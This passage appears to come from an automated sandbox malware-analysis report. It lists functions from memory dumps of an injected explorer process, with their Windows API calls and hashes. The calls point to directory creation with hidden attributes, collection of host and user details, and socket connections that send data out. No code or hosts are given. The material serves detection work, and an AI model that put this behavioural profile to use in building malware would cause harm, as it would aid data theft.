                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                                  • Instruction ID: 89a09e48ba4fb97036809bd0f2de0eb3bb7fed788277aed3cb678d43ad7da850
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B212776318B4186EB90CF21F859B9933A1FB9DB84F411035DAAE87718EE7AC159C700
                                                                                                                                                                                                                                  Function 0E0DF010 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0E0DECD0: GetWindowsDirectoryA.KERNEL32 ref: 0E0DED1C
                                                                                                                                                                                                                                    • Part of subcall function 0E0DECD0: GetVolumeInformationA.KERNEL32 ref: 0E0DED66
                                                                                                                                                                                                                                    • Part of subcall function 0E0DECD0: wsprintfA.USER32 ref: 0E0DEDC7
                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32 ref: 0E0DF063
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0DF073
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0DF081
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32 ref: 0E0DF08C
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32 ref: 0E0DF09A
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0DF0AA
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0DF0B8
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0DF0C8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                                  • Instruction ID: 22954ac0ebadff447a1c7926e0510f8483fd8073fa18558ceb04dbf941342739
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99114F71314B8282EB54DF61FC5475A73A1FB89B41F442831D98B57B28DEBCC0A98704
                                                                                                                                                                                                                                  Function 101FF010 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 101FECD0: GetWindowsDirectoryA.KERNEL32 ref: 101FED1C
                                                                                                                                                                                                                                    • Part of subcall function 101FECD0: GetVolumeInformationA.KERNEL32 ref: 101FED66
                                                                                                                                                                                                                                    • Part of subcall function 101FECD0: wsprintfA.USER32 ref: 101FEDC7
                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32 ref: 101FF063
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 101FF073
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 101FF081
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32 ref: 101FF08C
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32 ref: 101FF09A
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 101FF0AA
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 101FF0B8
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 101FF0C8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                                  • Instruction ID: e6050e7b7ac34281c58be4d6d3f13fa165ac8f0b13fc285aa67e77c73daf8c6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27117F32214B4581EB80DF20F859B9A73B2FB9DB50F402021E9DF07729DEBCC1888B00
                                                                                                                                                                                                                                  Function 0E0D45F0 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0E0D47B0: isdigit.MSVCRT ref: 0E0D47D7
                                                                                                                                                                                                                                  • tolower.MSVCRT ref: 0E0D4668
                                                                                                                                                                                                                                    • Part of subcall function 0E0D4450: malloc.MSVCRT ref: 0E0D4460
                                                                                                                                                                                                                                    • Part of subcall function 0E0D4450: free.MSVCRT ref: 0E0D4480
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0E0D46E9
                                                                                                                                                                                                                                  • _errno.MSVCRT ref: 0E0D46EF
                                                                                                                                                                                                                                  • strtod.MSVCRT ref: 0E0D470D
                                                                                                                                                                                                                                  • _errno.MSVCRT ref: 0E0D476A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3554981057-0
                                                                                                                                                                                                                                  • Opcode ID: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                                  • Instruction ID: 34b0bb9b7495bd6dc7c67d70bdbc61d43f1a20d4bc8df7cb01b663cf431ea6c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6041B232618B6086EB21DF22E85476E7AA5F749BD0F418415EF5643758EF7CC888CB40
                                                                                                                                                                                                                                  Function 0DF245F0 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF247B0: isdigit.MSVCRT ref: 0DF247D7
                                                                                                                                                                                                                                  • tolower.MSVCRT ref: 0DF24668
                                                                                                                                                                                                                                    • Part of subcall function 0DF24450: malloc.MSVCRT ref: 0DF24460
                                                                                                                                                                                                                                    • Part of subcall function 0DF24450: free.MSVCRT ref: 0DF24480
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0DF246E9
                                                                                                                                                                                                                                  • _errno.MSVCRT ref: 0DF246EF
                                                                                                                                                                                                                                  • strtod.MSVCRT ref: 0DF2470D
                                                                                                                                                                                                                                  • _errno.MSVCRT ref: 0DF2476A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3554981057-0
                                                                                                                                                                                                                                  • Opcode ID: 661ff6e15e55d5f87a73f8ab827580be280244a44d9fe6fd24e0a8d75ea9ec05
                                                                                                                                                                                                                                  • Instruction ID: 21e96339a9dfc2a60023db3a3b9da4d53017a4d1956dfee41bd8700f7b05bc15
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 661ff6e15e55d5f87a73f8ab827580be280244a44d9fe6fd24e0a8d75ea9ec05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F041BD32604B6186EB21CF69F85473A7AA5F395B80F01C026DE9643B94EFBDC084CB50
                                                                                                                                                                                                                                  Function 101F45F0 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 101F47B0: isdigit.MSVCRT ref: 101F47D7
                                                                                                                                                                                                                                  • tolower.MSVCRT ref: 101F4668
                                                                                                                                                                                                                                    • Part of subcall function 101F4450: malloc.MSVCRT ref: 101F4460
                                                                                                                                                                                                                                    • Part of subcall function 101F4450: free.MSVCRT ref: 101F4480
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 101F46E9
                                                                                                                                                                                                                                  • _errno.MSVCRT ref: 101F46EF
                                                                                                                                                                                                                                  • strtod.MSVCRT ref: 101F470D
                                                                                                                                                                                                                                  • _errno.MSVCRT ref: 101F476A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3554981057-0
                                                                                                                                                                                                                                  • Opcode ID: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                                  • Instruction ID: 174b333b93439a345ee7d4364a645334bb1b36b0020624d39f96f8bab3105cd8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb719943a006e7c47c6f7b8d1fbfdbe5fe472ac3c1273932a2dddfb86f4e4f71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0541ED32244B9987E710DF22E95870E7AA5F389BD0F028212EE8547758EF7CD4C8CB50
                                                                                                                                                                                                                                  Function 0E0D9200 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 0E0D9248
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0E0D9255
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0E0D928A
                                                                                                                                                                                                                                    • Part of subcall function 0E0DECD0: GetWindowsDirectoryA.KERNEL32 ref: 0E0DED1C
                                                                                                                                                                                                                                    • Part of subcall function 0E0DECD0: GetVolumeInformationA.KERNEL32 ref: 0E0DED66
                                                                                                                                                                                                                                    • Part of subcall function 0E0DECD0: wsprintfA.USER32 ref: 0E0DEDC7
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0E0D92AD
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0D92BD
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 0E0D9354
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: send.WS2_32 ref: 0E0D729C
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: recv.WS2_32 ref: 0E0D7303
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcmpiA.KERNEL32 ref: 0E0D7363
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrlenA.KERNEL32 ref: 0E0D7387
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: StrStrA.SHLWAPI ref: 0E0D739F
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcmpiA.KERNEL32 ref: 0E0D73BE
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: strtol.MSVCRT ref: 0E0D73D6
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0E0D92CD
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcpyA.KERNEL32 ref: 0E0D70CE
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D70DF
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D70F3
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D7107
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D7118
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D712C
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D714A
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: wsprintfA.USER32 ref: 0E0D7162
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D7176
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D718A
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrcatA.KERNEL32 ref: 0E0D71C6
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: WSAStartup.WS2_32 ref: 0E0D71D6
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: socket.WS2_32 ref: 0E0D71F2
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: gethostbyname.WS2_32 ref: 0E0D7209
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: memcpy.MSVCRT ref: 0E0D7229
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: htons.WS2_32 ref: 0E0D7238
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: connect.WS2_32 ref: 0E0D724F
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: lstrlenA.KERNEL32 ref: 0E0D7265
                                                                                                                                                                                                                                    • Part of subcall function 0E0D7070: send.WS2_32 ref: 0E0D727B
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0E0D936C
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0E0D937A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3667244998-0
                                                                                                                                                                                                                                  • Opcode ID: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                                  • Instruction ID: 01c9b3850aa3dcbf10d909f37e39ae651154c8bd987c51aced8c43e758127eb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A551453530ABC1A1EB10DB54F8543DAB7A5F789B84F400856DB8EA3768DF78C549CB40
                                                                                                                                                                                                                                  Function 101F9200 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 101F9248
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 101F9255
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 101F928A
                                                                                                                                                                                                                                    • Part of subcall function 101FECD0: GetWindowsDirectoryA.KERNEL32 ref: 101FED1C
                                                                                                                                                                                                                                    • Part of subcall function 101FECD0: GetVolumeInformationA.KERNEL32 ref: 101FED66
                                                                                                                                                                                                                                    • Part of subcall function 101FECD0: wsprintfA.USER32 ref: 101FEDC7
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 101F92AD
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 101F92BD
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 101F9354
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: send.WS2_32 ref: 101F729C
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: recv.WS2_32 ref: 101F7303
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcmpiA.KERNEL32 ref: 101F7363
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrlenA.KERNEL32 ref: 101F7387
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: StrStrA.SHLWAPI ref: 101F739F
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcmpiA.KERNEL32 ref: 101F73BE
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: strtol.MSVCRT ref: 101F73D6
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 101F92CD
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcpyA.KERNEL32 ref: 101F70CE
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F70DF
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F70F3
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F7107
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F7118
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F712C
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F714A
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: wsprintfA.USER32 ref: 101F7162
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F7176
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F718A
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F71C6
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: WSAStartup.WS2_32 ref: 101F71D6
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: socket.WS2_32 ref: 101F71F2
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: gethostbyname.WS2_32 ref: 101F7209
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: memcpy.MSVCRT ref: 101F7229
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: htons.WS2_32 ref: 101F7238
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: connect.WS2_32 ref: 101F724F
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrlenA.KERNEL32 ref: 101F7265
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: send.WS2_32 ref: 101F727B
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 101F936C
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 101F937A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3667244998-0
                                                                                                                                                                                                                                  • Opcode ID: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                                  • Instruction ID: 8bbaa177d4ab63bc99ad10d9332af40682a735ff8d43a32cc05e64070f8407fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbcf65caac76370d19fda381bb2748fd0743ccba9b3d65d8d807d26070440cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1351F735204B4981EB00DB65F89839AB3B5F799B84F600116E98D8B774DFBDC18ACB50
                                                                                                                                                                                                                                  Function 08A1D805 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2288870239-0
                                                                                                                                                                                                                                  • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction ID: aab37bdf09ebff245ade98bdbf9349c4b05124d2cd60094ba18b080948e203aa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9314134655E0A8FEFB8EB6DE9A5B6933A0FB59353FA4001C8409C2A64CB3CD446C711
                                                                                                                                                                                                                                  Function 0AE4D805 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2288870239-0
                                                                                                                                                                                                                                  • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction ID: cabe9e5063e4234aa18637e0891d099fafe3ef4f5f5146d84d7d63f814396627
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37313234665E0A8FEBB8EB59FCE9B7933A4FB5D315BA41018C405C2665CB7CD446CB01
                                                                                                                                                                                                                                  Function 0B30D805 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2288870239-0
                                                                                                                                                                                                                                  • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction ID: 62e68d54b514f91c260087f552d2045d50cea95de688509cf4b8f0f53d3190fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8312234675A0A8FEBB8EB9DE9B6B6977E0FF59311FB400288405C21E4DF3CA4458701
                                                                                                                                                                                                                                  Function 0E0E53E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32 ref: 0E0E5499
                                                                                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 0E0E54B3
                                                                                                                                                                                                                                    • Part of subcall function 0E0DF310: WideCharToMultiByte.KERNEL32 ref: 0E0DF353
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32 ref: 0E0E54DC
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0E0E54ED
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0E0E553D
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: EnterCriticalSection.KERNEL32 ref: 0E0D9248
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: RtlInitializeCriticalSection.NTDLL ref: 0E0D9255
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcpyA.KERNEL32 ref: 0E0D928A
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcpyA.KERNEL32 ref: 0E0D92AD
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcatA.KERNEL32 ref: 0E0D92BD
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcatA.KERNEL32 ref: 0E0D92CD
